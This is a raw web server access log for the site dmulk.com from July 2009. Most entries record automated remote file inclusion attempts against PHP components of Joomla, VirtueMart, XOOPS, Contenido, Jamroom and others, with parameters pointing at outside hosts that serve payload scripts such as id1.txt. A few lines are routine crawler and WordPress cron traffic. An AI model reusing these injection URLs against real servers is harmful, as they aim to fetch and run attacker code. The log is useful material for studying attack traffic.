218.104.188.3 - - [26/Jul/2009:11:33:33 -0700] "GET /logs/access_080708.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:11:33:33 -0700] "GET /logs/access_080527.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:34:28 -0700] "GET /logs//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:34:28 -0700] "GET /logs/access_081225.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:34:28 -0700] "GET /tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:11:34:52 -0700] "GET /include/bbs.lib.inc.php?site_path=http://shanghaisisa.com/skin/hajar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:35:39 -0700] "GET /logs/access_080712.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.162.130.92 - - [26/Jul/2009:11:36:12 -0700] "GET /logs/access_090225.log HTTP/1.1" 200 1048576 "http://www.domainsuite.com/domain-tools/citywriter/c99.txt" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:36:22 -0700] "GET /logs/access_080619.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:36:22 -0700] "GET /logs/access_080320.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:11:36:55 -0700] "GET /logs/access_090119.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:11:37:12 -0700] "GET /logs/access_081225.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:11:37:50 -0700] "GET /logs/access_080712.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:38:26 -0700] "GET /logs/access_080708.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:38:27 -0700] "GET /logs/access_080527.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:11:38:28 -0700] "GET /bikes/WeSTOC07/ HTTP/1.0" 200 955 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:38:33 -0700] "GET /logs/access_080209.log////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:38:33 -0700] "GET /logs/access_080326.log////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:38:52 -0700] "GET /tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:38:52 -0700] "GET /logs//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:38:52 -0700] "GET /logs/access_081225.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /logs/access_080229.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:39:27 -0700] "GET /logs/access_080229.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:11:40:31 -0700] "GET /logs/access_080708.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:11:40:31 -0700] "GET /logs/access_080509.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:40:48 -0700] "GET /logs/access_080712.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:40:48 -0700] "GET /logs/access_080619.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:40:54 -0700] "GET /logs/access_080320.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:11:40:55 -0700] "GET /logs/access_071228.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:41:02 -0700] "GET /logs/access_080320.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:41:03 -0700] "GET /logs/access_080619.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:28 -0700] "GET /logs/access_080621.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:41:53 -0700] "GET /logs/access_081225.log%20%20//tools/errors.php?error=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:56 -0700] "GET /logs/access_090119.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:41:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:41:58 -0700] "GET /logs/access_080320.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:41:58 -0700] "GET /logs/access_080619.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:42:00 -0700] "GET /logs/access_080320.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:42:04 -0700] "GET /logs/access_080619.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:42:08 -0700] "GET /logs/access_080712.log%20%20//tools/errors.php?error=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:28 -0700] "GET /logs/access_090213.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:28 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 110062 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:29 -0700] "GET /logs/access_090213.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:29 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 110062 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:11:44:31 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
64.157.4.43 - - [26/Jul/2009:11:44:31 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:31 -0700] "GET /logs/access_090213.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:31 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 110062 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:11:44:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:11:44:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:11:44:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:39 -0700] "GET /logs/access_080906.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:41 -0700] "GET /logs/access_080906.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:42 -0700] "GET /logs/access_080906.log////?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:46 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 21154 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:46 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 21154 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [26/Jul/2009:11:44:46 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://203.157.127.5/emeeting/download_data/id.txt?? HTTP/1.1" 200 21154 "-" "libwww-perl/5.805" "www.dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:45:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:45:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:45:35 -0700] "GET /logs/access_080621.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:46:16 -0700] "GET /logs/access_080322.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:46:18 -0700] "GET /logs/access_080730.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:46:22 -0700] "GET /logs/access_080322.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:11:46:23 -0700] "GET /logs/access_080730.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:47:09 -0700] "GET /logs/access_080613.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:47:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:47:13 -0700] "GET /logs/access_090119.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.86.123.181 - - [26/Jul/2009:11:47:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:11:47:49 -0700] "GET /logs/access_080613.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:48:31 -0700] "GET /logs/access_080613.log//tools/errors.php?error=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:11:48:45 -0700] "GET /logs/access_090107.log/?APB_rp=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:11:48:45 -0700] "GET /logs/?APB_rp=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 110055 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:11:48:45 -0700] "GET /?APB_rp=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 21115 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:11:48:55 -0700] "GET /logs/access_090217.log/?APB_rp=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:11:50:19 -0700] "GET /logs/access_080519.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:11:50:57 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
74.6.8.100 - - [26/Jul/2009:11:51:00 -0700] "GET /blog/index.php/2008/08/ HTTP/1.0" 200 12861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.100 - - [26/Jul/2009:11:51:08 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.0" 200 10083 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.100 - - [26/Jul/2009:11:51:13 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.0" 200 5715 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.100 - - [26/Jul/2009:11:51:19 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.0" 200 3864 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:53:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:53:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:53:03 -0700] "GET /logs/access_080621.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:54:03 -0700] "GET /logs/access_081009.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:54:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:11:54:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:11:54:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:11:54:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:11:54:38 -0700] "GET /logs/access_090119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:54:47 -0700] "GET /logs/access_081225.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:54:47 -0700] "GET /logs/access_080712.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:11:56:26 -0700] "GET /logs/access_080712.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:58:09 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:58:09 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:58:11 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:11:58:21 -0700] "GET /logs/access_081224.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:58:44 -0700] "GET /logs/access_080906.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:59:23 -0700] "GET /logs/access_080712.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:11:59:24 -0700] "GET /logs/access_081225.log%20%20//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:12:00:10 -0700] "GET /logs/access_080712.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:00:43 -0700] "GET /logs/access_081018.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:00:43 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:00:43 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:01:39 -0700] "GET /logs/access_081018.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:02:08 -0700] "GET /logs/access_090119.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:21 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:21 -0700] "GET /logs/access_080527.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
